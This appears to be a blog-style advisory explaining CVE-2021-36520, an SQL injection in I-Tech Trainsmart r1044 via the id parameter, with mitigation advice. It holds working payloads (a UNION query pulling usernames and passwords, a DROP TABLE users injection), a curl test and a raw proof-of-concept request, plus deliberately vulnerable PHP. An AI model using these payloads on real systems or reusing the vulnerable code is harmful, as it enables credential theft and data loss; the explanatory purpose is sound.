CVE-2021-36520 - SQL Injection in I-Tech Trainsmart (r1044) via `/evaluation/assign-evaluation?id=` URI

I-Tech Trainsmart is a corporate training management solution used by many organizations to design and deliver training programs. In mid-2021, a critical vulnerability was discovered in Trainsmart version r1044, recorded as CVE-2021-36520. This vulnerability allows attackers to perform SQL Injection through the id parameter on the URL path /evaluation/assign-evaluation.

Below, we’ll break down this issue in simple language, look at sample vulnerable code, and explain how a practical exploit can work. We also provide links for deeper research.

What is SQL Injection?

SQL Injection (SQLi) is a web security vulnerability that lets an attacker push dangerous SQL code into a backend database. If an app doesn’t properly check user input, attackers can read, change, or even destroy data on the server.

Where’s the Problem in Trainsmart?

The endpoint /evaluation/assign-evaluation?id= in Trainsmart r1044 takes data from the URL directly and runs it in a database query. The system fails to sanitize or validate the id value, so a hacker can include SQL statements.

Example Vulnerable URL

http://<server>/evaluation/assign-evaluation?id=123

But if a hacker uses

http://<server>/evaluation/assign-evaluation?id=123' OR '1'='1

The SQL command changes. This can manipulate the database to return more data than the user should see, or even allow destructive commands.

Suppose the backend code looks like this

<?php
// Grab 'id' from the URL
$id = $_GET['id'];

// BAD: Direct insertion into SQL without sanitization!
$query = "SELECT * FROM evaluations WHERE id = '$id'";

// Executes the query
$result = mysqli_query($dbconn, $query);
?>

If $id is not sanitized, an attacker can change the nature of the query.

By setting id=123' OR '1'='1, the database query becomes

SELECT * FROM evaluations WHERE id = '123' OR '1'='1'

The OR '1'='1' part tricks the database into returning every row, not just one.

2. Extract Data

More advanced payloads can be used to extract sensitive information—like usernames and passwords—if error messages or union queries are possible:

id=123' UNION SELECT username, password FROM users--

This can return results from other tables.

If the database user has write privileges, payloads can destroy data

id=123'; DROP TABLE users; --

This could delete user records.

You can verify SQL Injection like this (using curl)

curl "http://target-site/evaluation/assign-evaluation?id=1'; OR '1'='1"

If the response returns extra information or errors indicating invalid SQL syntax, the site is likely vulnerable.

A proof-of-concept (for bug bounty or penetration testing)

GET /evaluation/assign-evaluation?id=1%27%20union%20select%201,username,password%20from%20users-- HTTP/1.1
Host: target-site

NOTE: Only run such tests with explicit permission on your own systems, or for professional security audits.

Sanitize User Input: Always clean and validate input parameters.

2. Use Prepared Statements: Instead of inserting user data directly into SQL, use parameterized queries.

`

3. Least Privilege: Make sure the database account used by the app has only the permissions it needs.

References

* NVD: CVE-2021-36520
* SQL Injection Explained
* OWASP SQL Injection Prevention Cheat Sheet

Conclusion

CVE-2021-36520 puts I-Tech Trainsmart users at risk of serious data breaches by exposing a simple but dangerous SQL injection vulnerability. Always sanitize inputs, patch your software, and use secure coding practices to protect your organization.

If you use Trainsmart, check your logs, update your software, and review your database security right away.

Timeline

Published on: 04/16/2023 04:15:00 UTC
Last modified on: 04/25/2023 20:33:00 UTC